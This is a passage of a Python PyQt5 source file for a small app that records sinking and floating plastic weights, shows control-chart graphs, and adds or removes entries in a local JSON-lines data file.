self.label_2.setWordWrap(True)\n self.label_2.setObjectName(\"label_2\")\n self.veiwLPercentageChangeFloatButton = QtWidgets.QPushButton(self.centralwidget)\n 
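# QRect arguments are (x, y, width, height) in pixels, relative to the parent widget\n 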
self.veiwLPercentageChangeFloatButton.setGeometry(QtCore.QRect(10, 230, 411, 31))\n self.veiwLPercentageChangeFloatButton.setObjectName(\"veiwLPercentageChangeFloatButton\")\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\n self.label_3.setGeometry(QtCore.QRect(10, 240, 411, 81))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_3.setFont(font)\n self.label_3.setWordWrap(True)\n self.label_3.setObjectName(\"label_3\")\n self.returnToFloatMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.returnToFloatMenuButton.setGeometry(QtCore.QRect(10, 310, 411, 31))\n self.returnToFloatMenuButton.setObjectName(\"returnToFloatMenuButton\")\n self.label_4 = QtWidgets.QLabel(self.centralwidget)\n self.label_4.setGeometry(QtCore.QRect(10, 330, 411, 51))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_4.setFont(font)\n self.label_4.setWordWrap(True)\n self.label_4.setObjectName(\"label_4\")\n self.label_5 = QtWidgets.QLabel(self.centralwidget)\n self.label_5.setGeometry(QtCore.QRect(40, 30, 381, 20))\n font = QtGui.QFont()\n font.setPointSize(15)\n self.label_5.setFont(font)\n self.label_5.setObjectName(\"label_5\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(10, 50, 411, 20))\n self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(3)\n self.line.setMidLineWidth(3)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 441, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.returnToFloatMenuButton.clicked.connect(self.backButtonPressed)\n \n self.veiwLineGraphFloatButton.clicked.connect(self.veiwLineGraphPressed)\n self.veiwBarGraphFloatButton.clicked.connect(self.veiwBarGraphPressed)\n self.veiwLPercentageChangeFloatButton.clicked.connect(self.veiwSTDGraphPressed)\n\n #go back to add data point menu\n @staticmethod\n def backButtonPressed(self):\n runClass(\"floatMainMenu\")\n \n #veiw Linegraph\n @staticmethod\n def veiwLineGraphPressed(self):\n csvMaker.create(\"floatData.txt\")\n SSCFL.call()#six sigma calc float line graph \n\n #veiw BarGraph\n @staticmethod\n def veiwBarGraphPressed(self):\n print(\"hi\")\n csvMaker.create(\"floatData.txt\")\n SSCFB.call()#six sigma calc float bar graph \n\n #veiw std graph\n @staticmethod\n def veiwSTDGraphPressed(self):\n csvMaker.create(\"floatData.txt\")\n SSCFPCC.call()#six sigma calc float bar graph \n\n\n\n\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.veiwLineGraphFloatButton.setText(_translate(\"MainWindow\", \"Veiw Floating Percentage Data Line Graph\"))\n self.label.setText(_translate(\"MainWindow\", \"Default graph. 
Contains UCL and LCL data for floating data percentages in a detailed line graph\"))\n self.veiwBarGraphFloatButton.setText(_translate(\"MainWindow\", \"Veiw Floating Distribution Bar Graph\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Bar graph that shows the distribution of the percent of floating plastic versus the sinking plastic percentage.\"))\n self.veiwLPercentageChangeFloatButton.setText(_translate(\"MainWindow\", \"Veiw Floating Percentage Deviation Graph\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Graph that shows distrubitons from the mean of the dataset. Can be used as another way to analyze data from the line graph.\"))\n self.returnToFloatMenuButton.setText(_translate(\"MainWindow\", \"Return to Float menu\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Return to previous menu.\"))\n self.label_5.setText(_translate(\"MainWindow\", \"How would you like to veiw your data?\"))\n\n\n#main menu for float data\nclass sinkMainMenu(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(294, 283)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.viewGraphButton = QtWidgets.QPushButton(self.centralwidget)\n self.viewGraphButton.setGeometry(QtCore.QRect(20, 110, 260, 31))\n self.viewGraphButton.setObjectName(\"viewGraphButton\")\n \n self.settingsButton = QtWidgets.QPushButton(self.centralwidget)\n self.settingsButton.setGeometry(QtCore.QRect(20, 190, 260, 31))\n self.settingsButton.setObjectName(\"settingsButton\")\n self.quitToSelectButton = QtWidgets.QPushButton(self.centralwidget)\n self.quitToSelectButton.setGeometry(QtCore.QRect(150, 230, 131, 31))\n self.quitToSelectButton.setObjectName(\"quitToSelectButton\")\n self.editDataPointButton = QtWidgets.QPushButton(self.centralwidget)\n self.editDataPointButton.setGeometry(QtCore.QRect(20, 150, 260, 31))\n self.editDataPointButton.setObjectName(\"editDataPointButton\")\n self.addNewDPandGraphButton = QtWidgets.QPushButton(self.centralwidget)\n self.addNewDPandGraphButton.setGeometry(QtCore.QRect(20, 70, 260, 31))\n self.addNewDPandGraphButton.setObjectName(\"addNewDPandGraphButton\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(20, 40, 260, 31))\n font = QtGui.QFont()\n font.setBold(False)\n font.setWeight(50)\n self.line.setFont(font)\n self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(3)\n self.line.setMidLineWidth(3)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(90, 20, 121, 31))\n font = QtGui.QFont()\n font.setPointSize(15)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.helpMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.helpMenuButton.setGeometry(QtCore.QRect(20, 230, 128, 31))\n self.helpMenuButton.setObjectName(\"helpMenuButton\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 294, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n #Back to float main menu\n 
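# note: backButtonPressed actually returns to the float-or-sink selection screen (runClass(\"floatOrSinkMenu\"))\n 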
self.quitToSelectButton.clicked.connect(self.backButtonPressed)\n\n self.addNewDPandGraphButton.clicked.connect(self.addPointsPressed)\n \n \n self.viewGraphButton.clicked.connect(self.graphSelection)\n \n \n self.editDataPointButton.clicked.connect(self.veiwAndEditDatapoints)\n\n self.settingsButton.clicked.connect(self.floatSettingsPressed)\n\n\n #run graph selection class\n @staticmethod\n def graphSelection(self):\n runClass(\"floatChooseGraphType\")\n\n @staticmethod\n def backButtonPressed(self):\n runClass(\"floatOrSinkMenu\")\n\n @staticmethod\n def addPointsPressed(self):\n runClass(\"smmAddDP\")\n\n @staticmethod\n def veiwAndEditDatapoints(self):\n runClass(\"editFloatDataPoint\")\n\n #run settings\n @staticmethod\n def floatSettingsPressed(self):\n runClass(\"floatSettings\")\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Sinking Data - Main Menu\"))\n self.viewGraphButton.setText(_translate(\"MainWindow\", \"view Graphs\"))\n self.settingsButton.setText(_translate(\"MainWindow\", \"Settings\"))\n self.quitToSelectButton.setText(_translate(\"MainWindow\", \"Quit to Select\"))\n self.editDataPointButton.setText(_translate(\"MainWindow\", \"view And Edit Data Points\"))\n self.addNewDPandGraphButton.setText(_translate(\"MainWindow\", \"Add New Data Point\"))\n self.label.setText(_translate(\"MainWindow\", \"Floating Data\"))\n self.helpMenuButton.setText(_translate(\"MainWindow\", \"Help Menu\"))\n\n\nclass smmAddDP(object):\n def setupUi(self, MainWindow):\n self.currentDateCBChecked = True\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(341, 377)\n font = QtGui.QFont()\n font.setPointSize(12)\n MainWindow.setFont(font)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.sinkingWeightTextBox = QtWidgets.QTextEdit(self.centralwidget)\n self.sinkingWeightTextBox.setEnabled(True)\n self.sinkingWeightTextBox.setGeometry(QtCore.QRect(220, 70, 111, 21))\n self.sinkingWeightTextBox.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.sinkingWeightTextBox.setObjectName(\"sinkingWeightTextBox\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(30, 60, 171, 41))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(30, 90, 151, 41))\n self.label_2.setObjectName(\"label_2\")\n self.floatingWeightTextBox = QtWidgets.QTextEdit(self.centralwidget)\n self.floatingWeightTextBox.setEnabled(True)\n self.floatingWeightTextBox.setGeometry(QtCore.QRect(220, 100, 111, 21))\n self.floatingWeightTextBox.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.floatingWeightTextBox.setObjectName(\"floatingWeightTextBox\")\n self.useCurrentDatecheckBox = QtWidgets.QCheckBox(self.centralwidget)\n self.useCurrentDatecheckBox.setGeometry(QtCore.QRect(30, 160, 171, 20))\n self.useCurrentDatecheckBox.setObjectName(\"useCurrentDatecheckBox\")\n self.useCurrentDatecheckBox.toggle()\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\n self.label_3.setGeometry(QtCore.QRect(30, 120, 181, 41))\n self.label_3.setObjectName(\"label_3\")\n self.dateTextBox = QtWidgets.QTextEdit(self.centralwidget)\n self.dateTextBox.setEnabled(True)\n self.dateTextBox.setGeometry(QtCore.QRect(220, 130, 
111, 21))\n self.dateTextBox.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.dateTextBox.setObjectName(\"dateTextBox\")\n #get date and disable date box\n self.dateTextBox.setDisabled(True)\n self.currentDateLabel = QtWidgets.QLabel(self.centralwidget)\n self.currentDateLabel.setGeometry(QtCore.QRect(190, 160, 121, 20))\n self.currentDateLabel.setObjectName(\"currentDateLabel\")\n self.currentDateLabel.setText(_translate(\"MainWindow\", self.currentDateFormatted()))\n \n \n\n self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton.setGeometry(QtCore.QRect(30, 200, 271, 31))\n self.pushButton.setObjectName(\"pushButton\")#veiw graphs\n self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 240, 271, 31))\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(30, 50, 271, 20))\n self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(2)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n self.label_4 = QtWidgets.QLabel(self.centralwidget)\n self.label_4.setGeometry(QtCore.QRect(30, 30, 271, 20))\n self.label_4.setAlignment(QtCore.Qt.AlignCenter)\n self.label_4.setObjectName(\"label_4\")\n self.quitToMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.quitToMenuButton.setGeometry(QtCore.QRect(30, 280, 271, 31))\n self.quitToMenuButton.setObjectName(\"quitToMenuButton\")\n self.statusLabel = QtWidgets.QLabel(self.centralwidget)\n self.statusLabel.setGeometry(QtCore.QRect(110, 10, 111, 20))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.statusLabel.setFont(font)\n self.statusLabel.setText(\"\")\n self.statusLabel.setAlignment(QtCore.Qt.AlignCenter)\n self.statusLabel.setObjectName(\"statusLabel\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 331, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n \n self.useCurrentDatecheckBox.stateChanged.connect(lambda:self.dateCBEval(self.useCurrentDatecheckBox))#lambda fycbiton call checkbox eval\n\n self.pushButton.clicked.connect(self.addPoint)\n\n self.quitToMenuButton.clicked.connect(self.backButtonPressed)\n self.pushButton_2.clicked.connect(self.graphSelection)\n\n #run graph selection class\n @staticmethod\n def graphSelection(self):\n runClass(\"floatChooseGraphType\")\n #go back to flaot main menu\n @staticmethod\n def backButtonPressed(self):\n runClass(\"floatMainMenu\")\n \n #create error message based on input\n def createErrorMessage(self,title,message):\n errorMsg = QMessageBox()\n errorMsg.setIcon(QMessageBox.Critical)\n errorMsg.setText(title)\n errorMsg.setInformativeText(message)\n errorMsg.setWindowTitle(title)\n errorMsg.exec()\n\n def dateCBEval(self,checkbox):#toggle text box\n if checkbox.isChecked() == True:\n self.dateTextBox.setDisabled(True)\n else:\n self.dateTextBox.setDisabled(False)\n \n\n def addPoint(self):\n sinkWeightFloat = \"\"\n floatWeightFloat = \"\"\n \n if self.useCurrentDatecheckBox.isChecked():\n dateString = str(self.currentDateFormatted())\n else:\n dateString = self.dateTextBox.toPlainText()\n sinkWeightString 
= self.sinkingWeightTextBox.toPlainText()\n floatWeightString = self.floatingWeightTextBox.toPlainText()\n\n sinkErrorIn = False\n floatErrorIn = False\n try:\n sinkWeightFloat = float(sinkWeightString)\n except ValueError:\n self.createErrorMessage(\"Error!\",\"Input for Sink Weight is Invalid!\")\n sinkErrorIn = True\n try:\n floatWeightFloat = float(floatWeightString)\n except ValueError:\n self.createErrorMessage(\"Error!\",\"Input for Float Weight is Invalid!\")\n floatErrorIn = True\n\n if floatErrorIn != False or sinkErrorIn != False:\n print(floatErrorIn)\n print(sinkErrorIn)\n return None\n\n print(dateString)\n print(sinkWeightFloat)\n print(floatWeightFloat)\n \n \n data = self.makeJsonData(dateString,sinkWeightFloat,floatWeightFloat)\n self.saveToJson(data)\n \n #format data to json dict\n def makeJsonData(self,date,sinkWeight,floatWeight):\n \n data = {\"date\":date,\"sink\":sinkWeight,\"float\":floatWeight}\n \n print(data)\n return data\n #save data\n def saveToJson(self,data):\n with open('floatData.txt', 'a') as file:\n json.dump(data, file)\n file.write(\"\\n\")\n\n \n\n \n\n\n\n\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.label.setText(_translate(\"MainWindow\", \"Sinking weight (g) :\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Floating weight (g) :\"))\n self.useCurrentDatecheckBox.setText(_translate(\"MainWindow\", \"use Current Date : \"))\n self.label_3.setText(_translate(\"MainWindow\", \"Date ( MM/DD/YYYY) :\"))\n \n self.pushButton.setText(_translate(\"MainWindow\", \"Add data point\"))\n self.pushButton_2.setText(_translate(\"MainWindow\", \"Veiw Graphs\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Add Float Data point\"))\n self.quitToMenuButton.setText(_translate(\"MainWindow\", \"Return to menu\"))\n \n def currentDateFormatted(self):\n currentDate = datetime.date.today()\n day = currentDate.day\n month = currentDate.month\n year = currentDate.year\n\n formattedDate = \"%s/%s/%s\" % (month,day,year)\n\n return formattedDate\n\n#edit fmm data points\nclass editFloatDataPoint(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(332, 476)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.listWidget = QtWidgets.QListWidget(self.centralwidget)\n self.listWidget.setGeometry(QtCore.QRect(15, 51, 301, 291))\n self.listWidget.setObjectName(\"listWidget\")\n self.listWidget.setSpacing(5)\n \n self.removeEntryButton = QtWidgets.QPushButton(self.centralwidget)\n self.removeEntryButton.setGeometry(QtCore.QRect(15, 360, 301, 31))\n self.removeEntryButton.setObjectName(\"removeEntryButton\")\n self.returnToMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.returnToMenuButton.setGeometry(QtCore.QRect(15, 400, 301, 31))\n self.returnToMenuButton.setObjectName(\"returnToMenuButton\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(15, 40, 301, 3))\n self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(3)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(15, 10, 301, 20))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label.setFont(font)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n 
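# centered title label sitting above the entries list\n 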
self.label.setObjectName(\"label\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 332, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n \n self.retranslateUi(MainWindow)\n self.entries = self.fillList(\"floatData.txt\")\n \n \n\n print(self.entries)\n\n self.fillTable(self.entries)\n\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n #get current item\n self.currentItem = \"\"\n self.listWidget.itemSelectionChanged.connect(self.returnSelectedItem)\n\n \n\n\n\n\n #return to menu\n self.returnToMenuButton.clicked.connect(self.returnToMenuPressed)\n \n #remove entry pressed\n \n #lamba im using kinda like static\n #maybe better than static for non class things?\n self.removeEntryButton.clicked.connect(lambda: self.removeEntryPressed(self.currentItem))\n \n\n\n #return active item\n def returnSelectedItem(self):\n selectedItem = self.listWidget.currentItem().text()\n print(selectedItem)\n self.currentItem = selectedItem\n print(\"current item\")\n print(self.currentItem)\n\n\n def removeEntryPressed(self,currentItem):\n entryStr = currentItem\n self.confirmDeleteMessage(entryStr)\n\n\n def removeItemFromList(self,item,file):\n #HOW WORKS\n #FIND DATA IN FILE AND THEN WRITE BACK TO FILE EXCLUDING ORIGNINAL DATA POINT\n dataLines = []\n \n itemData = item.strip(\"\\n\")\n itemData = itemData.replace(\"Entry Date: \",\"\")\n itemData = itemData.replace(\"Sinking Plastic Weight: \",\":\")\n itemData = itemData.replace(\"Floating Plastic Weight: \",\":\")\n itemData = itemData.replace(\"\\n\",\"\")\n \n itemDataList = itemData.split(\":\")\n\n date = itemDataList[0]\n sinking = itemDataList[1]\n floating = itemDataList[2]\n \n \n print(\"====================================\")\n print(\"itemData: \",itemDataList)\n print(\"====================================\")\n\n \n\n with open(str(file),\"r\") as entryFile:\n for entry in entryFile.readlines():\n dataLines.append(entry)\n entryFile.close\n\n for line in dataLines:\n lineJson = json.loads(line)\n \n \n\n if str(lineJson[\"date\"]) == str(date) and str(lineJson[\"sink\"]) == str(sinking) and str(lineJson[\"float\"]) == str(floating):\n print(\"MATCH FOUND\")\n print(lineJson)\n print(itemDataList)\n lineToExclude = line#exclude this line during writeback thus deleting it\n\n print(\"Lines: \",dataLines)\n\n with open(str(file),\"r\") as entryFile:\n lines = entryFile.readlines()\n with open(str(file),\"w\") as entryFile:\n for line in lines:\n \n if line != lineToExclude:\n entryFile.write(line)\n else:\n print(\"LINE REMOVED\")\n self.createAlertPopup(\"Removed!\",\"Entry was removed succesfully!\",\"Entry Removed!\")\n \n runClass(\"editFloatDataPoint\") #it updates\n\n def createAlertPopup(self,title,message,winTitle):\n alertMsg = QMessageBox()\n alertMsg.setIcon(QMessageBox.Information)\n alertMsg.setText(title)\n alertMsg.setInformativeText(message)\n alertMsg.setWindowTitle(winTitle)\n alertMsg.exec()\n\n @staticmethod\n def returnToMenuPressed(self):\n runClass(\"floatMainMenu\")\n\n def confirmDeleteMessage(self,item):\n item = item.replace(\"----------------------------------------------------\",\"\")\n\n confirmDeleteMessagebox= QMessageBox()\n confirmDeleteMessagebox.setIcon(QMessageBox.Warning)\n confirmDeleteMessagebox.setText(\"Are you sure you would like 
to delete the following entry? This action cannot be undone.\")\n \n \n confirmDeleteMessagebox.setInformativeText(item)\n confirmDeleteMessagebox.setWindowTitle(\"Confirm Deletion?\")\n confirmDeleteMessagebox.addButton(QMessageBox.Yes)\n confirmDeleteMessagebox.addButton(QMessageBox.No)\n confirmDeleteMessagebox.exec()\n buttonResult = confirmDeleteMessagebox.clickedButton().text() #could cause probs\n buttonResult= buttonResult.replace(\"&\",\"\").lower()\n \n print(buttonResult)\n\n if buttonResult == \"yes\":#yes button is pressed\n print(\"yes\")\n self.removeItemFromList(item,\"floatData.txt\")\n \n if buttonResult == \"no\":#no button is pressed\n print(\"nomegalul\")\n pass\n \n \n\n \n\n def fillList(self,list):\n entries = []\n with open(str(list),\"r\") as entryFile:\n for entry in entryFile.readlines():\n entries.append(entry)\n print(entry,\"\\n\")\n \n #print(entries)\n entryFile.close()\n return entries\n\n\n\n def formatEntry(self,item):\n \n item = json.loads(item)\n date = item[\"date\"]\n sinkingWeight = item[\"sink\"]\n floatingWeight = item[\"float\"]\n\n #==================================\n #----------------------------------------------------\n formattedString = \"----------------------------------------------------\\nEntry Date: \" + str(date) + \"\\nSinking Plastic Weight: \" + str(sinkingWeight) + \"\\nFloating Plastic Weight: \" + str(floatingWeight) +\"\\n----------------------------------------------------\" \n\n print(formattedString)\n\n\n return(formattedString)\n\n\n def fillTable(self,entryList):\n for item in entryList:\n item = self.formatEntry(item)\n \n self.listWidget.addItem(item)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.removeEntryButton.setText(_translate(\"MainWindow\", \"Remove Selected Entry\"))\n self.returnToMenuButton.setText(_translate(\"MainWindow\", \"Return To Menu\"))\n self.label.setText(_translate(\"MainWindow\", \"Edit Floating Data\"))\n\n\n\n\n\nclass floatSettings(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(453, 538)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(20, 50, 411, 20))\n self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(3)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(20, 20, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(20)\n self.label.setFont(font)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(20, 70, 401, 41))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(\"label_2\")\n self.uclTargetInput = QtWidgets.QTextEdit(self.centralwidget)\n self.uclTargetInput.setGeometry(QtCore.QRect(220, 80, 41, 21))\n self.uclTargetInput.setAcceptDrops(True)\n self.uclTargetInput.setAutoFillBackground(False)\n self.uclTargetInput.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.uclTargetInput.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.uclTargetInput.setObjectName(\"uclTargetInput\")\n self.setUclTargetButton = 
QtWidgets.QPushButton(self.centralwidget)\n self.setUclTargetButton.setGeometry(QtCore.QRect(270, 80, 41, 21))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.setUclTargetButton.setFont(font)\n self.setUclTargetButton.setObjectName(\"setUclTargetButton\")\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\n self.label_3.setGeometry(QtCore.QRect(20, 120, 151, 41))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label_3.setFont(font)\n self.label_3.setObjectName(\"label_3\")\n self.label_4 = QtWidgets.QLabel(self.centralwidget)\n self.label_4.setGeometry(QtCore.QRect(20, 90, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_4.setFont(font)\n self.label_4.setObjectName(\"label_4\")\n self.uclTargetLabel = QtWidgets.QLabel(self.centralwidget)\n self.uclTargetLabel.setGeometry(QtCore.QRect(170, 120, 41, 41))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.uclTargetLabel.setFont(font)\n self.uclTargetLabel.setObjectName(\"uclTargetLabel\")\n self.exportDataButton = QtWidgets.QPushButton(self.centralwidget)\n self.exportDataButton.setGeometry(QtCore.QRect(20, 180, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.exportDataButton.setFont(font)\n self.exportDataButton.setObjectName(\"exportDataButton\")\n self.label_5 = QtWidgets.QLabel(self.centralwidget)\n self.label_5.setGeometry(QtCore.QRect(20, 210, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_5.setFont(font)\n self.label_5.setWordWrap(True)\n self.label_5.setObjectName(\"label_5\")\n self.label_6 = QtWidgets.QLabel(self.centralwidget)\n self.label_6.setGeometry(QtCore.QRect(20, 270, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_6.setFont(font)\n self.label_6.setWordWrap(True)\n self.label_6.setObjectName(\"label_6\")\n self.importDataButton = QtWidgets.QPushButton(self.centralwidget)\n self.importDataButton.setGeometry(QtCore.QRect(20, 250, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.importDataButton.setFont(font)\n self.importDataButton.setObjectName(\"importDataButton\")\n self.label_7 = QtWidgets.QLabel(self.centralwidget)\n self.label_7.setGeometry(QtCore.QRect(20, 420, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_7.setFont(font)\n self.label_7.setWordWrap(True)\n self.label_7.setObjectName(\"label_7\")\n self.resetDataButton = QtWidgets.QPushButton(self.centralwidget)\n self.resetDataButton.setGeometry(QtCore.QRect(20, 390, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.resetDataButton.setFont(font)\n self.resetDataButton.setObjectName(\"resetDataButton\")\n self.returnToMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.returnToMenuButton.setGeometry(QtCore.QRect(20, 460, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.returnToMenuButton.setFont(font)\n self.returnToMenuButton.setObjectName(\"returnToMenuButton\")\n self.line_2 = QtWidgets.QFrame(self.centralwidget)\n self.line_2.setGeometry(QtCore.QRect(20, 150, 201, 16))\n self.line_2.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line_2.setLineWidth(3)\n self.line_2.setFrameShape(QtWidgets.QFrame.HLine)\n self.line_2.setObjectName(\"line_2\")\n self.createBackupButton = QtWidgets.QPushButton(self.centralwidget)\n self.createBackupButton.setGeometry(QtCore.QRect(20, 320, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.createBackupButton.setFont(font)\n self.createBackupButton.setObjectName(\"createBackupButton\")\n self.label_8 = QtWidgets.QLabel(self.centralwidget)\n 
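# caption below the backup button; its text is set in retranslateUi\n        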
self.label_8.setGeometry(QtCore.QRect(20, 340, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_8.setFont(font)\n self.label_8.setWordWrap(True)\n self.label_8.setObjectName(\"label_8\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 453, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.updateUclLabel()\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n\n self.returnToMenuButton.clicked.connect(self.returnToMenuPressed)\n\n self.setUclTargetButton.clicked.connect(lambda: self.settingsSetUcl())\n\n self.exportDataButton.clicked.connect(lambda: self.exportFloatData(\"floatDataExported.ssg\"))\n\n self.importDataButton.clicked.connect(lambda: self.importFloatData())\n\n self.resetDataButton.clicked.connect(lambda: self.clearAllData())\n \n \n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.label.setText(_translate(\"MainWindow\", \"Float Settings\"))\n 